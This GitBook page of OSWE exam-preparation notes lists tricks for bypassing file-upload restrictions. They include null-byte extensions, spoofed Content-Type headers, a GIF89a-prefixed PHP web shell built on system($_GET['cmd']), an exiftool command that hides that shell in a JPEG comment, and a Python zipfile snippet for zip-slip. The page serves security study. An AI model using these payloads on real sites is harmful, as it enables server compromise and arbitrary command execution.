AWAE - OSWE Preparation / Resources
  • TL;DR
  • General
    • Resources
      • BurpSuite
      • WhiteBox
    • POCs
      • Deserialization
        • PHP
        • Java
          • Ysoserial
      • SQL Injection
      • Type Juggling
      • CSRF
  • By Vulnerability
    • SQL Injection
      • Summary
      • Types
      • Injection by clause
      • Bypassing Character Restrictions
      • By Language
        • JAVA
          • Regex
          • Summary
      • Regex
      • Resources
    • Deserialization
      • By Language
        • PHP
          • Regex
          • Summary
          • Practice
        • JAVA
          • Regex
          • Summary
          • Practice
          • Resources
        • .NET
          • Regex
          • Summary
          • Resources
      • Resources
    • XSS
    • XXE
      • By Language
        • PHP
          • Practice
          • Resources
        • Java
          • Vulnerable Libraries' Implementation
      • Resources
    • SSTI
      • Summary
      • Practice
      • Resources
    • File Upload Restrictions Bypass
      • Tricks
      • File Extension Filters Bypass List
      • Resources
  • REGEX
  • By Language
    • PHP
      • Regex
      • Type Juggling
        • Summary
        • Practice
    • Java
      • Decompiling
      • Compiling & Running
    • NodeJS
      • Practice
  • Random
  • Other Repositories
Powered by GitBook
On this page
  • Null Byte
  • Mime type
  • GIF89a;
  • Inside image's content
  • Create ZIP manually (e.g: zipslip)
  • Using zipfile

Was this helpful?

  1. By Vulnerability
  2. File Upload Restrictions Bypass

Tricks

Null Byte

  • .php%00.gif

  • .php\x00.gif

  • .php%00.png

  • .php\x00.png

  • .php%00.jpg

  • .php\x00.jpg

Mime type

  • Content-Type : image/gif

  • Content-Type : image/png

  • Content-Type : image/jpeg

GIF89a;

GIF89a;
<?
system($_GET['cmd']);
?>

Inside image's content

exiftool -Comment='<?php system($_GET['cmd']); ?>' photo.jpg

Create ZIP manually (e.g: zipslip)

from zipfile import ZipFile

zip = ZipFile("test.zip", "w")
zip.writestr("path", "content")

zip.close()
PreviousFile Upload Restrictions BypassNextFile Extension Filters Bypass List

Last updated 4 years ago

Was this helpful?

Using

zipfile